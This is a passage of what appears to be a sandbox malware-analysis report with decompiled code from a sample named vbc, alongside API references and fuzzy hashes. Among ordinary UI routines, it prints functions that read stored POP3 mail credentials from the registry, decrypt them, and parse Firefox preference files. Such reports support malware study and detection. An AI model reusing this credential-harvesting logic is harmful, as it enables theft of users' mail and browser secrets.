					_t78 = 0x14;
					_t53 = _t86 * _t78;
					_push( ~(0 | _t91 > 0x00000000) | _t53);   /* same overflow-guarded size idiom */
					L00412090();    /* operator new(count*0x14) */
					 *(_t80 + 0x10) = _t53;
					if(_t86 > 0) {
						_t54 = 0;
						do {
							 *((intOrPtr*)(_t54 +  *(_t80 + 0x10) + 0xc)) = 0x78;   /* field at +0xc of each record set to 0x78 */
							_t54 = _t54 + 0x14;
							_t86 = _t86 - 1;
						} while (_t86 != 0);
					}
					_v8 = 1;    /* remember that the table is ours and must be freed on exit */
				}
				if(E004014EA(0x448, _t80, _a4) == 1) {   /* callee not in this excerpt */
					E0040851B( *(_t80 + 0xc), ( *(_t80 + 0xc))[2]);
					InvalidateRect(( *(_t80 + 0xc))[2], 0, 0);
				}
				_t47 = SetFocus(_a8);
				if(_v8 != 0) {
					_push( *(_t80 + 0x10));
					L00412096();    /* operator delete on the temporary table */
				}
				return _t47;
			}

Instruction addresses for the C lines above (one entry per line, in the report's order):
0x0040596a 0x0040596e 0x00405973 0x00405975 0x00405978 0x0040597b 0x00405983 0x0040598b 0x00405985 0x00405985
0x00405987 0x00405987 0x0040598d 0x00405990 0x00405992 0x00405994 0x00405996 0x00405997 0x0040599d 0x0040599d
0x004059a3 0x004059a6 0x004059b0 0x004059b1 0x004059b4 0x004059bd 0x004059be 0x004059cd 0x004059cf 0x004059dd
0x004059e2 0x004059e5 0x004059ea 0x004059f1 0x004059f4 0x004059fd 0x004059fe 0x00405a06 0x00405a09 0x00405a0b
0x00405a0d 0x00405a10 0x00405a18 0x00405a1b 0x00405a1b 0x00405a0d 0x00405a1e 0x00405a1e 0x00405a36 0x00405a3e
0x00405a4b 0x00405a4b 0x00405a54 0x00405a5d 0x00405a5f 0x00405a62 0x00405a67 0x00405a6b

APIs
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: ??2@$??3@$FocusInvalidateRectmemset
• String ID:
• API String ID: 2313361498-0
• Opcode ID: a580d9142bc32eaab65664efd4de07b17d343628356770d299779b1e7220968e
• Instruction ID: c9d5e52e17e49b2fdf2665c470f327c4663aeb176fcf1135955ad165868745cd
• Opcode Fuzzy Hash: a580d9142bc32eaab65664efd4de07b17d343628356770d299779b1e7220968e
• Instruction Fuzzy Hash: 113183B2600601AFDB249F79D985A2AF7A4FB08354710863FF55AD7290DB78AC50CF58
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
E0040A7B2(void* __esi) {
	struct HDWP__* _v8;
	int _v12;
	intOrPtr _v16;
	struct tagRECT _v32;
	struct tagRECT _v48;
	void* _t32;
	int _t60;
	int _t65;

	if( *((intOrPtr*)(__esi + 0x124)) != 0) {
		GetClientRect( *(__esi + 0x108),  &_v32);
		GetWindowRect( *(__esi + 0x114),  &_v48);
		_t65 = _v48.bottom - _v48.top + 1;
		GetWindowRect( *(__esi + 0x118),  &_v48);
		_v12 = _v32.right - _v32.left;
		_t60 = _v48.bottom - _v48.top + 1;
		_v16 = _v32.bottom - _v32.top;
		_v8 = BeginDeferWindowPos(3);
		DeferWindowPos(_v8,  *(__esi + 0x118), 0, 0, 0, _v12, _t60, 4);
		DeferWindowPos(_v8,  *(__esi + 0x114), 0, 0, _v32.bottom - _t65 + 1, _v12, _t65, 6);
		DeferWindowPos(_v8,  *( *((intOrPtr*)(__esi + 0x370)) + 0x184), 0, 0, _t60, _v12, _v16 - _t60 - _t65, 4);
		return EndDeferWindowPos(_v8);
	}
	return _t32;
}

APIs
• GetClientRect.USER32 ref: 0040A7D1
• GetWindowRect.USER32 ref: 0040A7E7
• GetWindowRect.USER32 ref: 0040A7FA
• BeginDeferWindowPos.USER32 ref: 0040A817
• DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040A834
• DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040A854
• DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040A87B
• EndDeferWindowPos.USER32(?), ref: 0040A884
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Window$Defer$Rect$BeginClient
• String ID:
• API String ID: 2126104762-0
• Opcode ID: e3d9293826481cef379b2e174ab533f7da62d5a41b3e9301ba56b14c5600b15e
• Instruction ID: 09cbeee5e8014f0efd252c30326660bc7ddd54a992e069e65e32613af5811a3b
• Opcode Fuzzy Hash: e3d9293826481cef379b2e174ab533f7da62d5a41b3e9301ba56b14c5600b15e
• Instruction Fuzzy Hash: AF21C871A00209FFDB11DFA8DD89FEEBBB9FB08311F104465FA55A2160CA71AA519B24
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 88%
E0040649B(void* __edx, struct HWND__* _a4) {
	struct HDC__* _v12;
	struct tagRECT _v28;
	struct HDC__* _t19;
	signed int _t32;
	int _t33;
	int _t35;
	int _t37;
	void* _t38;
	int _t39;
	intOrPtr _t40;
	intOrPtr _t45;

	_t38 = __edx;
	_t35 = GetSystemMetrics(0x11);
	_t39 = GetSystemMetrics(0x10);
	if(_t35 == 0 || _t39 == 0) {
		_t19 = GetDC(0);
		_v12 = _t19;
		_t39 = GetDeviceCaps(_t19, 8);
		_t35 = GetDeviceCaps(_v12, 0xa);
		ReleaseDC(0, _v12);
	}
	GetWindowRect(_a4,  &_v28);
	_t45 = _v28.right;
	_t40 = _v28.bottom;
	asm("cdq");
	asm("cdq");
	_t32 = _v28.top - _t40 + _t35 - 1 - _t38;
	_t37 = _v28.left - _t45 + _t39 - 1 - _t38 >> 1;
	_t33 = _t32 >> 1;
	if(_t32 < 0) {
		_t33 = 0;
	}
	if(_t37 < 0) {
		_t37 = 0;
	}
	return MoveWindow(_a4, _t37, _t33, _t45 - _v28.left + 1, _t40 - _v28.top + 1, 1);
}

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetSystemMetrics.USER32 ref: 004064AC
                                                                                                                                                                        • GetSystemMetrics.USER32 ref: 004064B2
                                                                                                                                                                        • GetDC.USER32(00000000), ref: 004064C0
                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 004064D2
                                                                                                                                                                        • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 004064DB
                                                                                                                                                                        • ReleaseDC.USER32 ref: 004064E4
                                                                                                                                                                        • GetWindowRect.USER32 ref: 004064F1
                                                                                                                                                                        • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00406536
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1999381814-0
                                                                                                                                                                        • Opcode ID: 49d5a035e180b7af43cac72741eab6a6786db33261f0c5654e3a6ca50601d200
                                                                                                                                                                        • Instruction ID: ba7d715333d017d2103329686637bd52cca5eef1020c3fd7483cce7c10731540
                                                                                                                                                                        • Opcode Fuzzy Hash: 49d5a035e180b7af43cac72741eab6a6786db33261f0c5654e3a6ca50601d200
                                                                                                                                                                        • Instruction Fuzzy Hash: 1011A232A00219AFDF109FB8DC09BEF7FB9EB44351F054135EE06E3290DA70A9418A90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 91%
                                                                                                                                                                        			// Places the NUL-terminated ANSI string _a4 on the clipboard as CF_TEXT (format 1).
                                                                                                                                                                        			// EmptyClipboard/SetClipboardData require the clipboard to be open, so the caller
                                                                                                                                                                        			// must already have called OpenClipboard (not visible in this function).
                                                                                                                                                                        			// Returns nonzero when SetClipboardData succeeded.
                                                                                                                                                                        			E00406073(void* _a4) {
                                                                                                                                                                        				signed int _t11;
                                                                                                                                                                        				int _t13;
                                                                                                                                                                        				void* _t17;
                                                                                                                                                                        				signed int _t19;
                                                                                                                                                                        				void* _t22;
                                                                                                                                                                        
                                                                                                                                                                        				_t22 = _a4;
                                                                                                                                                                        				_t19 = 0;
                                                                                                                                                                        				EmptyClipboard();
                                                                                                                                                                        				if(_t22 != 0) {
                                                                                                                                                                        					_t2 = strlen(_t22) + 1; // 0x1 (byte count including the terminator)
                                                                                                                                                                        					_t13 = _t2;
                                                                                                                                                                        					_t17 = GlobalAlloc(0x2000, _t13); // 0x2000 = GMEM_DDESHARE
                                                                                                                                                                        					if(_t17 != 0) {
                                                                                                                                                                        						memcpy(GlobalLock(_t17), _t22, _t13);
                                                                                                                                                                        						GlobalUnlock(_t17);
                                                                                                                                                                        						_t11 = SetClipboardData(1, _t17); // CF_TEXT; on success the clipboard owns _t17
                                                                                                                                                                        						asm("sbb esi, esi");
                                                                                                                                                                        						_t19 =  ~( ~_t11); // neg/sbb/neg idiom: _t19 = (_t11 != 0)
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				CloseClipboard();
                                                                                                                                                                        				return _t19;
                                                                                                                                                                        			}

                                                                                                                                                                        APIs
                                                                                                                                                                        • EmptyClipboard.USER32(?,?,0040AFC1,?), ref: 0040607B
                                                                                                                                                                        • strlen.MSVCRT ref: 00406088
                                                                                                                                                                        • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040AFC1,?), ref: 00406097
                                                                                                                                                                        • GlobalLock.KERNEL32 ref: 004060A4
                                                                                                                                                                        • memcpy.MSVCRT ref: 004060AD
                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004060B6
                                                                                                                                                                        • SetClipboardData.USER32(00000001,00000000), ref: 004060BF
                                                                                                                                                                        • CloseClipboard.USER32(?,?,0040AFC1,?), ref: 004060CF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpystrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3116012682-0
                                                                                                                                                                        • Opcode ID: c70b900a696f57a29a369809a0454994a779be389cf8b88d1f6a35ab18b15240
                                                                                                                                                                        • Instruction ID: d09f43d2fefddb7d7ea69405cde3b0bd2fff4912bca4764858ce7f0ae225efb5
                                                                                                                                                                        • Opcode Fuzzy Hash: c70b900a696f57a29a369809a0454994a779be389cf8b88d1f6a35ab18b15240
                                                                                                                                                                        • Instruction Fuzzy Hash: 09F090371402296BC2102FA4BC4CE9B7FACDF88B56B058139FA0AD2251DE74894486A9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 80%
                                                                                                                                                                        			// Reads a text file (opened via E00406BA3 from _a4 + 4) line by line. For every line of
                                                                                                                                                                        			// the form user_pref("name", "value"); or user_pref("name", value); it copies the name
                                                                                                                                                                        			// into _v3088 and the value into _v2064 and calls the callback stored at *_a4 with
                                                                                                                                                                        			// (name, value); a zero return from the callback ends the walk. This is the shape of a
                                                                                                                                                                        			// Firefox prefs.js reader. From their use, E0040692F appears to read the next line into
                                                                                                                                                                        			// _v1040 and E00406A01 appears to be a substring search returning an offset; the report
                                                                                                                                                                        			// does not name either helper, nor the string constants at 0x413b10 and 0x413b18.
                                                                                                                                                                        			E0040C70B(void* __eflags, intOrPtr* _a4) {
                                                                                                                                                                        				int _v8;
                                                                                                                                                                        				char _v12;
                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                        				void _v1029;
                                                                                                                                                                        				void _v1039;
                                                                                                                                                                        				char _v1040;
                                                                                                                                                                        				void _v2063;
                                                                                                                                                                        				void _v2064;
                                                                                                                                                                        				void _v3087;
                                                                                                                                                                        				void _v3088;
                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                        				intOrPtr _t53;
                                                                                                                                                                        				void* _t54;
                                                                                                                                                                        				void* _t56;
                                                                                                                                                                        				void* _t59;
                                                                                                                                                                        				void* _t60;
                                                                                                                                                                        				void* _t67;
                                                                                                                                                                        				void* _t68;
                                                                                                                                                                        				void* _t73;
                                                                                                                                                                        				void* _t85;
                                                                                                                                                                        				int _t86;
                                                                                                                                                                        				void* _t106;
                                                                                                                                                                        				int _t107;
                                                                                                                                                                        				int _t111;
                                                                                                                                                                        				void* _t114;
                                                                                                                                                                        				void* _t115;
                                                                                                                                                                        				void* _t116;
                                                                                                                                                                        
                                                                                                                                                                        				// three 1024-byte stack buffers: current line (_v1040), name (_v3088), value (_v2064)
                                                                                                                                                                        				_v1040 = 0;
                                                                                                                                                                        				memset( &_v1039, 0, 0x3ff);
                                                                                                                                                                        				_v3088 = 0;
                                                                                                                                                                        				memset( &_v3087, 0, 0x3ff);
                                                                                                                                                                        				_v2064 = 0;
                                                                                                                                                                        				memset( &_v2063, 0, 0x3ff);
                                                                                                                                                                        				_t116 = _t115 + 0x24;
                                                                                                                                                                        				_t53 = E00406BA3(_a4 + 4);
                                                                                                                                                                        				_v12 = 0;
                                                                                                                                                                        				_v16 = _t53;
                                                                                                                                                                        				_t54 = E0040692F(_t53,  &_v1040,  &_v1040,  &_v12); // first line
                                                                                                                                                                        				if(_t54 != 0) {
                                                                                                                                                                        					do {
                                                                                                                                                                        						// lines that do not carry the user_pref(" prefix are skipped
                                                                                                                                                                        						_t56 = E00406A01(0, "user_pref(\"");
                                                                                                                                                                        						_pop(_t92);
                                                                                                                                                                        						if(_t56 != 0) {
                                                                                                                                                                        							goto L10;
                                                                                                                                                                        						}
                                                                                                                                                                        						// find the closing quote of the name, searching after the 11-byte prefix;
                                                                                                                                                                        						// offset - 11 is the name length, an empty or missing name skips the line
                                                                                                                                                                        						_push(0x413b10);
                                                                                                                                                                        						_t60 = 0xb;
                                                                                                                                                                        						_t14 = E00406A01(_t60) - 0xb; // -11
                                                                                                                                                                        						_t92 = _t14;
                                                                                                                                                                        						_v8 = _t92;
                                                                                                                                                                        						if(_t92 <= 0) {
                                                                                                                                                                        							goto L10;
                                                                                                                                                                        						}
                                                                                                                                                                        						// locate the separator after the name, then look for an opening quote after it
                                                                                                                                                                        						_t85 = E00406A01(_t61 + 1, 0x413b18);
                                                                                                                                                                        						_t17 = _t85 + 1; // 0x1
                                                                                                                                                                        						_t106 = E00406A01(_t17, 0x413b10);
                                                                                                                                                                        						if(_t106 <= 0) {
                                                                                                                                                                        							// no opening quote: unquoted value (number or bool) that runs up to ')'
                                                                                                                                                                        							_t28 = _t85 + 1; // 0x1
                                                                                                                                                                        							_t67 = E00406A01(_t28, ")");
                                                                                                                                                                        							_pop(_t92);
                                                                                                                                                                        							_t68 = 0xfffffffe;
                                                                                                                                                                        							_t111 = _t67 + _t68 - _t85; // value length
                                                                                                                                                                        							if(_t111 <= 0) {
                                                                                                                                                                        								goto L10;
                                                                                                                                                                        							}
                                                                                                                                                                        							// _v1029 is _v1040 + 11, the text right after user_pref("
                                                                                                                                                                        							_t107 = _v8;
                                                                                                                                                                        							memcpy( &_v3088,  &_v1029, _t107);
                                                                                                                                                                        							 *((char*)(_t114 + _t107 - 0xc0c)) = 0; // terminate the name
                                                                                                                                                                        							_t73 = _t114 + _t85 - 0x40a;
                                                                                                                                                                        							L9:
                                                                                                                                                                        							memcpy( &_v2064, _t73, _t111);
                                                                                                                                                                        							_t92 = _a4;
                                                                                                                                                                        							_t116 = _t116 + 0x18;
                                                                                                                                                                        							 *((char*)(_t114 + _t111 - 0x80c)) = 0; // terminate the value
                                                                                                                                                                        							// hand (name, value) to the callback; a zero return stops the walk
                                                                                                                                                                        							_t59 =  *((intOrPtr*)( *_a4))( &_v3088,  &_v2064);
                                                                                                                                                                        							if(_t59 == 0) {
                                                                                                                                                                        								break;
                                                                                                                                                                        							}
                                                                                                                                                                        							goto L10;
                                                                                                                                                                        						}
                                                                                                                                                                        						// quoted value: length is the distance between the two quotes, empty values are skipped
                                                                                                                                                                        						_t20 = _t106 + 1; // 0x1
                                                                                                                                                                        						_t111 = E00406A01(_t20, 0x413b10) - _t106 - 1;
                                                                                                                                                                        						_pop(_t92);
                                                                                                                                                                        						if(_t111 <= 0) {
                                                                                                                                                                        							goto L10;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t86 = _v8;
                                                                                                                                                                        						memcpy( &_v3088,  &_v1029, _t86);
                                                                                                                                                                        						 *((char*)(_t114 + _t86 - 0xc0c)) = 0; // terminate the name
                                                                                                                                                                        						_t73 = _t114 + _t106 - 0x40b;
                                                                                                                                                                        						goto L9;
                                                                                                                                                                        						L10:
                                                                                                                                                                        						_t59 = E0040692F(_v16, _t92,  &_v1040,  &_v12); // next line
                                                                                                                                                                        					} while (_t59 != 0);
                                                                                                                                                                        					return _t59;
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t54;
                                                                                                                                                                        			}

APIs
Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memcpymemset$strlen$_memicmp
• String ID: user_pref("
• API String ID: 765841271-2487180061
• Opcode ID: b6f81e50d3f8e97912bf56328f9eb2e236efc4b8b3b87e64c123cb08f78c772a
• Instruction ID: c71e9d7c33fd880144b5893e014edb1d15ca38a86f0d2a268660e68eb467e50f
• Opcode Fuzzy Hash: b6f81e50d3f8e97912bf56328f9eb2e236efc4b8b3b87e64c123cb08f78c772a
• Instruction Fuzzy Hash: 134168769041199ADB14EB95DCC0EDA77AC9F44314F1083BBE605F7181EA389F49CF68
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 61%
                                                                                                                                                                        			E004055A9(intOrPtr _a4) {
                                                                                                                                                                        				struct HWND__* _v12;
                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                        				int _v20;
                                                                                                                                                                        				int _v24;
                                                                                                                                                                        				intOrPtr _v28;
                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                        				int _v48;
                                                                                                                                                                        				char* _v52;
                                                                                                                                                                        				void* _v64;
                                                                                                                                                                        				void _v319;
                                                                                                                                                                        				char _v320;
                                                                                                                                                                        				struct HWND__* _t53;
                                                                                                                                                                        				intOrPtr* _t59;
                                                                                                                                                                        				void* _t61;
                                                                                                                                                                        				intOrPtr _t66;
                                                                                                                                                                        				void* _t74;
                                                                                                                                                                        				void* _t80;
                                                                                                                                                                        				intOrPtr _t81;
                                                                                                                                                                        				void* _t84;
                                                                                                                                                                        				intOrPtr _t89;
                                                                                                                                                                        				short _t91;
                                                                                                                                                                        				signed int _t94;
                                                                                                                                                                        				short* _t95;
                                                                                                                                                                        				void* _t96;
                                                                                                                                                                        				void* _t97;
                                                                                                                                                                        
                                                                                                                                                                        				_t89 = _a4;
                                                                                                                                                                        				_t53 = GetDlgItem( *(_t89 + 4), 0x3e9);
                                                                                                                                                                        				_v12 = _t53;
                                                                                                                                                                        				SendMessageA(_t53, 0x1009, 0, 0);
                                                                                                                                                                        				SendMessageA(_v12, 0x1036, 0, 0x26);
                                                                                                                                                                        				do {
                                                                                                                                                                        				} while (SendMessageA(_v12, 0x101c, 0, 0) != 0);
                                                                                                                                                                        				_push(0xc8);
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_push(_v12);
                                                                                                                                                                        				_t80 = 6;
                                                                                                                                                                        				E0040492F(0x41344f, _t80);
                                                                                                                                                                        				_t59 =  *((intOrPtr*)(_t89 + 0xc));
                                                                                                                                                                        				_t81 =  *((intOrPtr*)(_t59 + 4));
                                                                                                                                                                        				_t97 = _t96 + 0x10;
                                                                                                                                                                        				_v32 = _t81;
                                                                                                                                                                        				_v28 =  *_t59;
                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                        				if(_t81 <= 0) {
                                                                                                                                                                        					L10:
                                                                                                                                                                        					_t61 = 2;
                                                                                                                                                                        					E004048C0(_t61, _v12, 0, _t61);
                                                                                                                                                                        					return SetFocus(_v12);
                                                                                                                                                                        				} else {
                                                                                                                                                                        					goto L3;
                                                                                                                                                                        				}
                                                                                                                                                                        				do {
                                                                                                                                                                        					L3:
                                                                                                                                                                        					_v16 = 0;
                                                                                                                                                                        					_v24 = 0;
                                                                                                                                                                        					do {
                                                                                                                                                                        						_t94 = _v16 << 2;
                                                                                                                                                                        						if( *((short*)(_v28 + _t94 + 2)) == _v20) {
                                                                                                                                                                        							_v320 = 0;
                                                                                                                                                                        							memset( &_v319, 0, 0xff);
                                                                                                                                                                        							_t97 = _t97 + 0xc;
                                                                                                                                                                        							_v52 =  &_v320;
                                                                                                                                                                        							_v64 = 4;
                                                                                                                                                                        							_v48 = 0xff;
				if(SendMessageA( *( *((intOrPtr*)(_a4 + 0xc)) + 8), 0x1019, _v16,  &_v64) != 0) {
					_push(_v16);
					_push(0);
					_push(_v12);
					_t84 = 5;
					_t74 = E00404978( &_v320, _t84);
					_t95 = _t94 + _v28;
					_t91 =  *_t95;
					E00404CF3(_v12, _t74, 0 | _t91 > 0x00000000);
					_t97 = _t97 + 0x18;
					if(_t91 == 0) {
						 *_t95 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10)) + _v24 + 0xc));
					}
				}
			}
			_v16 = _v16 + 1;
			_t66 = _v32;
			_v24 = _v24 + 0x14;
		} while (_v16 < _t66);
		_v20 = _v20 + 1;
	} while (_v20 < _t66);
	goto L10;
}

APIs
• GetDlgItem.USER32 ref: 004055C0
• SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 004055D9
• SendMessageA.USER32(?,00001036,00000000,00000026), ref: 004055E6
• SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 004055F2
• memset.MSVCRT ref: 0040565C
• SendMessageA.USER32(?,00001019,?,?), ref: 0040568D
• SetFocus.USER32(?), ref: 00405712
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: MessageSend$FocusItemmemset
• String ID:
• API String ID: 4281309102-0
• Opcode ID: b2ff56cee8ee5384e194c9e88251dfd2c05582b0ec5024aa31fc40173aaba44b
• Instruction ID: 7cc6a8daf3229b7d8e0d7717536759f0385f0427a9067e31b35bb84d252c6e93
• Opcode Fuzzy Hash: b2ff56cee8ee5384e194c9e88251dfd2c05582b0ec5024aa31fc40173aaba44b
• Instruction Fuzzy Hash: 3D414BB5D00109BFDB209F98DC85DAEBBB9EF04358F00846AE914B7291D7759E50CF94
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 89%
E004071D6(void* __ecx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
	char _v12;
	short* _v16;
	unsigned int _v20;
	char* _v24;
	char _v28;
	char _v288;
	char _v544;
	char _v800;
	char _v1056;
	char _v1584;
	void _v2607;
	char _v2608;
	void* __ebx;
	void* __edi;
	void* __esi;
	void* _t36;
	void* _t63;
	char* _t66;
	void* _t67;
	void* _t68;
	void* _t72;

	_t63 = __ecx;
	/* 0x400-byte buffer for the "POP3_credentials" value; _v12 carries its size in and out */
	_v2608 = 0;
	memset( &_v2607, 0, 0x3ff);
	_v12 = 0x400;
	_v1056 = 0;
	_v800 = 0;
	_v544 = 0;
	_v288 = 0;
	_t36 = E0040F214(_t63, _a8, "POP3_credentials",  &_v2608,  &_v12);
	_t72 = _t36;
	if(_t36 != 0) {
		return _t36;
	}
	_t67 =  &_v1584;
	E004046E1( &_v1584);
	if(E004047AA( &_v1584, _t72) != 0) {
		_v24 =  &_v2608;
		_v28 = _v12;
		/* E0040481B yields a wide-char string in _v16 (_v20 bytes long) that is narrowed into _v544 and NUL-terminated */
		if(E0040481B(_t67,  &_v28, 0,  &_v20) != 0) {
			 *((char*)(_t68 + WideCharToMultiByte(0, 0, _v16, _v20 >> 1,  &_v544, 0xfd, 0, 0) - 0x21c)) = 0;
			LocalFree(_v16);
			/* account name and host are read alongside the credential value */
			E0040F1F1(0xff, _t63, _a8, "POP3_name",  &_v800);
			E0040F1F1(0xff, _t63, _a8, "POP3_host",  &_v288);
			_t66 =  &_v1056;
			E004060DA(0xff, _t66, _a12);
			/* the assembled record is passed to the first function pointer in the table _a4 points to */
			 *((intOrPtr*)( *_a4))(_t66);
		}
	}
	return E004047FB( &_v1584);
}

APIs
• memset.MSVCRT ref: 004071F7
  • Part of subcall function 0040F214: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040245F,?), ref: 0040F22A
  • Part of subcall function 004046E1: strcpy.MSVCRT ref: 00404730
  • Part of subcall function 004047AA: LoadLibraryA.KERNELBASE(?,0040DC6C,80000001,73AFF420), ref: 004047B2
  • Part of subcall function 004047AA: GetProcAddress.KERNEL32(00000000,?), ref: 004047CA
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,0040738B,?,000000FD,00000000,00000000,?,00000000,0040738B,?,?,?,?,00000000), ref: 00407292
• LocalFree.KERNEL32(?,?,?,?,?,00000000,73AFED80,?), ref: 004072A2
  • Part of subcall function 0040F1F1: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040F582,?,?,?,?,0040F582,00000000,?,?), ref: 0040F20C
  • Part of subcall function 004060DA: strlen.MSVCRT ref: 004060DF
  • Part of subcall function 004060DA: memcpy.MSVCRT ref: 004060F4
Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWidememcpymemsetstrcpystrlen
• String ID: POP3_credentials$POP3_host$POP3_name
• API String ID: 604216836-2190619648
• Opcode ID: ad9c5c80b0256c337c12dec900ec01b57eb9c2969be2bde46c98a81af137ee1a
• Instruction ID: 7a8ee4d7bc4178ad58e78f2f27b608862355488638afca077fa6fa925b8dfb39
• Opcode Fuzzy Hash: ad9c5c80b0256c337c12dec900ec01b57eb9c2969be2bde46c98a81af137ee1a
• Instruction Fuzzy Hash: D8315075A4025DAFCB11EB69CC81ADE7BBCEB59344F0080B6FA04B3141D6349F598F65
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 41%
E00408065(void* __ecx, void* __eflags, struct tagMENUITEMINFOA _a4, struct HMENU__* _a8, intOrPtr _a12, int _a20, intOrPtr _a24, char* _a40, int _a44, char _a52, void _a53) {
    int _v0;
    int _t26;
    char* _t32;
    int _t44;
    signed int _t46;
    signed int _t47;

    _t38 = __ecx;
    _t47 = _t46 & 0xfffffff8;
    E00412360(0x1040, __ecx);
    _t26 = GetMenuItemCount(_a8);
    _t44 = 0;
    _v0 = _t26;
    if(_t26 <= 0) {
        L13:
        return _t26;
    } else {
        goto L1;
    }
    do {
        L1:
        memset(&_a53, 0, 0x1000);
        _t47 = _t47 + 0xc;
        _a40 = &_a52;
        _a4.cbSize = 0x30;
        _a8 = 0x36;
        _a44 = 0x1000;
        _a20 = 0;
        _a52 = 0;
        _t26 = GetMenuItemInfoA(_a8, _t44, 1, &_a4);
        if(_t26 == 0) {
            goto L12;
        }
        if(_a52 == 0) {
            L10:
            _t55 = _a24;
            if(_a24 != 0) {
                _push(0);
                _push(_a24);
                _push(_a4.cbSize);
                _t26 = E00408065(_t38, _t55);
                _t47 = _t47 + 0xc;
            }
            goto L12;
        }
        _t32 = strchr(&_a52, 9);
        if(_t32 != 0) {
            *_t32 = 0;
        }
        _t33 = _a20;
        if(_a24 != 0) {
            if(_a12 == 0) {
                *0x4181b4 = *0x4181b4 + 1;
                _t33 = *0x4181b4 + 0x11558;
                __eflags = *0x4181b4 + 0x11558;
            } else {
                _t18 = _t44 + 0x11171; // 0x11171
                _t33 = _t18;
            }
        }
        _t26 = E0040802D(_t33, &_a52);
        _pop(_t38);
        goto L10;
        L12:
        _t44 = _t44 + 1;
    } while (_t44 < _v0);
    goto L13;
}

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
